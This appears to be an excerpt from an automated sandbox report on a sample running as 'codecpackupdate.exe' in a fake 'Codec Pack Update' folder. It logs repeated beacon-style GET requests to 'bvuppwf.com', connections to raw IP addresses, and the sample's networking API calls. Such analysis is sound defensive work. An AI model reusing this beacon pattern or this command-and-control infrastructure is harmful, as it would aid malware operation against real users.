        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic | HTTP traffic detected (22 identical requests): GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1 | Host: bvuppwf.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknown | TCP traffic detected without corresponding DNS query (15 connections): 88.80.148.19
        Source: unknown | UDP traffic detected without corresponding DNS query: 91.211.247.248
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_009F72A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free, 3_2_009F72A7
        Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ec909e3b HTTP/1.1 | Host: bvuppwf.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
